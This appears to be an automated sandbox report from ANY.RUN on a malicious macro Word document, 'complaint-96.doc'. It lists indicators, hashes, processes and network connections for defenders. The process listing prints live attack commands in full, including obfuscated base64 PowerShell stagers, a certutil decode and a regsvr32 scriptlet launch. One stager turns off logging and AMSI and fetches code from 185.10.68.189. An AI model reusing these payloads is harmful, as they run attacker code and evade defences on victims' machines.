analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

complaint-96.doc

Full analysis: https://app.any.run/tasks/2fd34fa1-62ac-49e0-9436-6586b7e2ce82
Verdict: Malicious activity
Analysis date: February 18, 2019, 19:10:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: cobalt, Template: Normal.dotm, Last Saved By: cobalt, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 30 23:22:00 2018, Last Saved Time/Date: Tue Oct 30 23:22:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 30, Security: 0
MD5:

8EC83DBA30C4F4D014899FBCC9A78171

SHA1:

96A942174C55F5F3AB7236EB7E3AC549B67C88DB

SHA256:

D57F128AFB4843B6F0072FADDA8DD14046B31703098E365BC5A226E117090D44

SSDEEP:

1536:W1J7YxuapCK+9U8wrvBtBeyaE/XDo3ZiweGpDoxGpdm+ynJWIER:SJsxuaoL9U8wrZzRsIweGs8MBWI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes PowerShell scripts

      • cMd.exe (PID: 2248)

    • Changes the autorun value in the registry

      • regsvr32.exe (PID: 2860)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cMd.exe (PID: 2248)

    • Creates files in the user directory

      • powershell.exe (PID: 3116)
      • cMd.exe (PID: 2248)
      • powershell.exe (PID: 1016)
      • certutil.exe (PID: 2676)

    • Application launched itself

      • cMd.exe (PID: 2248)

    • Starts Microsoft Office Application

      • powershell.exe (PID: 3116)

    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 3908)

    • Starts CertUtil for decode files

      • cMd.exe (PID: 2248)

    • Executes PowerShell scripts

      • regsvr32.exe (PID: 2860)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2956)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2956)
      • WINWORD.EXE (PID: 3132)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Document Microsoft Word 97-2003
CompObjUserTypeLen: 32
HeadingPairs:
  • Titre
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 34
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 30
Words: 5
Pages: 1
ModifyDate: 2018:10:30 23:22:00
CreateDate: 2018:10:30 23:22:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 2
LastModifiedBy: cobalt
Template: Normal.dotm
Comments: -
Keywords: -
Author: cobalt
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
9
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe winword.exe no specs cmd.exe no specs reg.exe no specs certutil.exe no specs regsvr32.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2956"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\complaint-96.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
4294967295
Version:
14.0.6024.1000
2248cMd /c C:\Users\admin\AppData\Roaming\DEhSsrKsvknMU.batC:\Windows\system32\cMd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3116powershell.exe -C ".( $ENV:coMSpEC[4,26,25]-Join'')( neW-obJeCt sYsTem.io.stReAMrEAdER(( neW-obJeCt sYstEM.io.cOMPreSSION.DEFLaTestreAm([sySTeM.Io.mEmoRyStREAM] [CONverT]::fROMbasE64sTrInG( 'pVNRa9swEH4P+D8cnsHWXDnxulGaEFjIkrWMNCVZCazugyufFw3H8iS1Tjb233d2nDH2MsaMfBx3p0/ffToZqypeaSXQGOBlukOoZVkrnQGfKy0Q+ExrpSfCSlXCWhZY2uIwVaWV5ROOnJ6X5zAG18PyeWhxVyVZHGVKuE4vuMGaLx+/oLCwPhhKRjdoow0+TgtJMCx6p+qyUGk2J9gg8LfWD31bkTH0D/v9dJdz8nIdKf25n8XkEzZZ4bMzoJMZEciVhsCT4zgegSeBFxbii8YNQwbfiWCV2i1RDN6j5dcNRa0q1PYA7tWH6d0wWS/nHzeT1SxZSKGVUblNlnkuBSaejAbJhsRIVmhkQ1ocEpc5vRXu1DO2aMBvG/zjKVyjeNLm76r9+B/ewT8Qb6QFNyR1F6u79Jy0++QzPl1hVUzEDCC4F1epfri8CI/Om7hzLgfsrPNeMdbNRuBfN3dEXcc+Y5HbChC7LVmi+jZoSUemKqQN/JdUQ6m0qm6PrVD2Pn5wei9qLS3yrTK2iVFAHwWVDd5pg9OTeWDRWN4qcQoz0gbo+23DH7NH09jVut0Ut4LT8vaDMXW8pa7OX7ORl+q4UdjvU1NfwWcQApU09kS6DYyMTbX99U66FxLhni66lrBI93Inv2EGDaDT+wk=' ) , [iO.COMprEsSION.cOMPREsSionMode]::dECOmPresS )) , [sYsTem.tEXt.enCoDING]::aSciI) ).reADtOeNd()"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3132"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /q "" C:\Program Files\Microsoft Office\Office14\WINWORD.EXEpowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3908C:\Windows\system32\cmd.exe /c reg query "HKCU\Software\Microsoft\Notepad" /V adminC:\Windows\system32\cmd.execMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2184reg query "HKCU\Software\Microsoft\Notepad" /V adminC:\Windows\system32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2676certutil -decode temp.txt zjs99XeaYqPnk.txtC:\Windows\system32\certutil.execMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2860regsvr32 /u /n /s /i:C:\Users\admin\AppData\Roaming\zjs99XeaYqPnk.txt scrobj.dllC:\Windows\system32\regsvr32.exe
cMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft(C) Register Server
Exit code:
4294967295
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1016"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W 1 -C [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('c3RvcC1wcm9jZXNzIC1uYW1lIHJlZ3N2cjMyIC1Gb3JjZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ=='))|iex; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('SWYoJHtQYFNgVmVyc2BJb05UQWJsZX0uUFNWZXJzaW9OLk1hSk9yIC1nZSAzKXske2dgUGZ9PVtSRWZdLkFTU2VNYmx5LkdFVFRZUEUoKCdTeXN0ZW0uJysnTWFuYWdlJysnbWUnKydudCcrJy5BJysndXRvbWF0aW9uLlUnKyd0aWxzJykpLiJHZVRGSWVgTGQiKCgnY2FjaGVkRycrJ3JvJysndXAnKydQb2xpYycrJ3lTZXR0aW4nKydncycpLCdOJysoJ29uUHUnKydibGljLCcrJ1N0YXQnKydpYycpKTtJZigke2dgcEZ9KXske0dgUGN9PSR7R2BwZn0uR2V0VkFMVWUoJHtOdWBMbH0pO0lmKCR7Z2BwY31bKCdTJysnY3InKydpcHRCJykrKCdsbycrJ2NrTG8nKydnZ2knKyduZycpXSl7JHtHYFBDfVsoJ1NjcmlwdCcrJ0InKSsoJ2wnKydvY2tMb2dnaScrJ25nJyldWygnRW5hJysnYicrJ2xlJysnU2MnKydyaXB0QicpKygnbG8nKydja0wnKydvZ2cnKydpbmcnKV09MDske2dgUEN9WygnU2NyaScrJ3AnKyd0QicpKygnbG9jaycrJ0xvZ2dpJysnbicrJ2cnKV1bKCdFbmEnKydiJysnbGVTYycrJ3JpJysncHRCJysnbG9ja0ludm9jYXRpb25Mb2cnKydnaScrJ25nJyldPTB9JHtWYEFsfT1bQ29sbGVDdGlvTnMuR2VOZVJpQy5EaWNUSU9OYXJ5W1NUUkluZyxTeVNUZW0uT0JKZUN0XV06Ok5ldygpOyR7dmBBbH0uQUREKCgnRScrJ25hYmxlJysnU2NyaXAnKyd0QicpKygnbG9jJysna0wnKydvZ2dpJysnbmcnKSwwKTske1ZgQWx9LkFkZCgoJ0VuYWJsZVNjcmknKydwdEJsbycrJ2NrSW4nKyd2bycrJ2NhdCcrJ2lvJysnbicrJ0xvJysnZ2dpbmcnKSwwKTske2dgUGN9WygoJ0hLJysnRVknKydfJysnTE9DQUxfTScrJ0FDSElORVBXJysnTVNvZnR3JysnYScrJ3JlJysnUCcrJ1dNUCcrJ29saScrJ2NpJysnZXNQV01NaScrJ2NyJysnb3NvZnQnKydQV01XaScrJ25kb3dzUFdNUCcrJ293JysnZXJTaCcrJ2VsJysnbFBXTVNjcmlwJysndEInKS5yZVBMYWNFKCdQV00nLCdcJykpKygnbG8nKydja0xvZycrJ2dpbmcnKV09JHt2YEFMfX1FTHNle1tTY1JpUHRCTE9ja10uIkdFVEZJZWBMRCIoKCdzaScrJ2duYScrJ3R1cmVzJyksJ04nKygnb25QdWJsaWMsU3RhJysndGknKydjJykpLlNFVFZhTFVlKCR7TnVgTEx9LChORXctT0JqRWN0IENvbExlQ3RJb25TLkdlbkVSaWMuSEFTSFNFdFtzVHJJTmddKSl9W1JlZl0uQXNTRW1CTHkuR0VUVHlwZSgoJ1MnKyd5c3RlbS5NYW5hZycrJ2VtZW50LkF1dG8nKydtYXRpbycrJ24nKycuQW0nKydzaVV0aWxzJykpfD97JHtffX18JXske199LkdldEZpRUxEKCgnYW1zaUluaXRGYScrJ2knKydsJysnZWQnKSwoJ05vJysnblB1JysnYmxpYyxTdCcrJ2F0aScrJ2MnKSkuU2V0VmFMVWUoJHtOdWBMbH0sJHt0UmBVZX0pfTt9O1tTeXN0RW0uTkV0LlNlclZpY2VQT0lOdE1hTkFnRXJdOjpFeFBFQ3QxMDBDT25UaU51RT0wOyR7d2BDfT1OZVctT0JqRWNUIFNZc1RlbS5OZVQuV0ViQ0xJZU5UOyR7dX09KCdNb3ppJysnbGxhLzUnKycuMCAoV2luZG93JysncyBOVCAnKyc2LjE7JysnIFcnKydPJysnVzYnKyc0OyBUcmknKydkZScrJ250LzcuMDsgcnYnKyc6MTEuMCcrJyknKycgbGknKydrZSBHZWMnKydrbycpO1tTeXN0ZW0uTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZXJ2ZXJDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjayA9IHske1RSYFVFfX07JHtXY30uSEVhREVycy5BZGQoKCdVc2VyLUFnJysnZScrJ250JyksJHtVfSk7JHt3YGN9LlBSb1h5PVtTWXN0ZW0uTkVULldFQlJFUXVlU3RdOjpEZUZhdUxUV0ViUHJPWFk7JHt3Q30uUHJPeFkuQ3JFZEVOVGlBTHMgPSBbU1lzVEVtLk5FdC5DUmVkZW50aUFMQ2FDSEVdOjpEZUZhVUx0TmV0d09SS0NyZURlbnRpYUxTOyR7U2BDUmBpUFQ6UHJPWFl9ID0gJHtXQ30uUHJveHk7JHtLfT1bU1lTVGVNLlRFWHQuRU5jb2RJTkddOjpBU0NJSS5HRVRCeVRFcygoJzdhODYxYzhmMScrJzI1JysnZTYnKyc5M2I0ZTEnKycxJysnOTInKyczNicrJ2Y2JysnYzc3JysnYjg3JykpOyR7cn09eyR7ZH0sJHtrfT0ke2FSYGdTfTske3N9PTAuLjI1NTswLi4yNTV8JXske0p9PSgke0p9KyR7U31bJHtffV0rJHtLfVske199JSR7a30uQ291bnRdKSUyNTY7JHtTfVske199XSwke3N9WyR7an1dPSR7c31bJHtqfV0sJHtTfVske199XX07JHtkfXwleyR7SX09KCR7aX0rMSklMjU2OyR7SH09KCR7SH0rJHtTfVske2l9XSklMjU2OyR7c31bJHtpfV0sJHtzfVske2h9XT0ke3N9WyR7SH1dLCR7U31bJHtpfV07JHtffS1iWE9yJHtTfVsoJHtzfVske2l9XSske3N9WyR7SH1dKSUyNTZdfX07JHtzYEVyfT0oJ2h0dHBzOi8nKycvJysnMTgnKyc1LjEwLjY4LjE4OTo0JysnNCcrJzMnKTske1R9PSgnL2FkJysnbScrJ2luL2dldC4nKydwaHAnKTske1dDfS5IZUFkRVJTLkFEZCgoJ0NvJysnbycrJ2tpZScpLCgnc2VzcycrJ2lvbj1TJysnQjAnKycvYlZmSCcrJ0hoN1ZyMWNqa2Z4NzZ1WXYnKydycGM9JykpO3doaWxlKC1ub3QgJHtkYEFUYX0peyR7ZGBBVEF9PSR7V2BjfS5Eb3dOTE9BRERBVEEoJHtTYEVSfSske3R9KTtzdGFydC1zbGVlcCAzfTske0lWfT0ke2RBYFRBfVswLi4zXTske2RBYFRBfT0ke0RgQVRBfVs0Li4ke2RgQVRBfS5MZU5HVEhdOy1Kb0luW0NIYXJbXV0oJiAke1J9ICR7RGBBdGF9ICgke2lgVn0rJHtLfSkpfElFWA==')) | IEXC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
regsvr32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 114
Read events
1 560
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
5
Text files
4
Unknown types
6

Dropped files

PID
Process
Filename
Type
2956WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6BE9.tmp.cvr
MD5:
SHA256:
3116powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S5GGPYESPXM4FNJQJNZ9.temp
MD5:
SHA256:
2956WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF29383192B40D9AE4.TMP
MD5:
SHA256:
3132WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR91F.tmp.cvr
MD5:
SHA256:
1016powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VST3RZC1UH7XA6MMEBSK.temp
MD5:
SHA256:
2956WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:728B059A88F82431C2575780509557DD
SHA256:809DDE67EAB0D29CCAC4913878BFE77AB8244608A26529FD5D9F179B3D025792
2956WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:6C3A26A298C70CD61C1986CD33220E68
SHA256:7A6FF88FBCE1B2C280852428E4C8F4968DA16C34F03C04BB74BB5622AA1AAD3D
2956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59423B1.wmfwmf
MD5:08ACFED3B12BB1567B4E63B43AC4E596
SHA256:E698160BA6B32DFD993AC2F3026B3F58B948795F08368BDB44BD0B7112BB05F1
3116powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2478ea.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
1016powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF260e10.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
18
DNS requests
3
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3116
powershell.exe
51.38.150.171:443
amf-fr.org
GB
unknown
1016
powershell.exe
185.10.68.189:443
Flokinet Ltd
SC
suspicious

DNS requests

Domain
IP
Reputation
amf-fr.org
  • 51.38.150.171
unknown
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
complaint-96.doc